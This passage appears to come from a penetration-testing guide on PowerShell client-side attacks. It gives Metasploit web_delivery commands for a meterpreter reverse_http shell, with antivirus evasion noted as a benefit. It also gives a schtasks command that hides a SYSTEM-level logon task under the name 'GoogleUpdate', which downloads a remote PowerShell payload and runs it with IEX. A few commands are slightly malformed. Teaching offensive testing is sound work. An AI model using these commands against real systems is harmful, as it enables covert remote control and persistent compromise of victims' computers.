Windows PowerShell is a command-line shell and scripting language intended to be used for system administration. Based on the .NET framework, it extends the capabilities that were available in VBScript. The language itself is quite extensible. Since it is built on .NET libraries, you can incorporate code from languages such as C# or VB.NET. You can also take advantage of third-party libraries. In spite of this extensibility, it is a concise language. VBScripts that require more than 100 lines of code can be reduced to as little as 10 lines of PowerShell!

Perhaps, the best feature of PowerShell is that it is available by default on most modern Windows-based operating systems (Windows 7 and higher versions) and cannot be removed.

To launch the attack, we will use the PowerShell Payload Web Delivery module of the Metasploit framework. The purpose of this module is to rapidly establish a session on the target system. The attack does not write to the disk, so it is less likely to trigger detection by the client-side antivirus. Launching the attack and the available module options are shown in the following screenshot:

Before the attack is completed, the attacker must prepare a listener for the incoming shell. URIPATH was randomly generated by Metasploit; make sure that the correct URIPATH is set for the listener. The following simple script to create a listener are as follows:

use exploit/multi/script/web_delivery 
set SRVHOST <your IP>
set target 2
set payload windows/meterpreter/reverse_http
set LHOST <your IP>
set URIPATH boom 
set payload 
exploit 

The Metasploit framework will generate a one-line Python script that can be embedded or run on the target as shown in the following screenshot:

A successful attack will create an interactive limited shell on the attacker's system.

The following command will create a scheduled task, GoogleUpdate, which will implement powershell.exe (by default, located in the Windowssystem32 directory) at logon:

schtasks /ru "SYSTEM" /create /tn GoogleUpdate /tr "powershell -windowstyle hidden -nologo -noninteractive -ep -bypass -nop -c 'IEX ((new-object net.webclient).DownloadString(''http://192.168.0.24:8080/boom'''))'" /sc onlogon

Additional PowerShell scripts designed to support post exploit activities can be found in Kali's PowerSploit directory. In spite of the flexibility of PowerShell, it has some disadvantages.

For example, if the document containing the macro is closed by the end user before a persistence mechanism can be applied, the connection is lost.

More importantly, scripts such as VBScript and PowerShell are only useful against Microsoft environments. To extend the reach of client-side attacks, we need to look for a common client-side vulnerability that can be exploited regardless of its operating system environment. One particular example of such a vulnerability is cross-site scripting.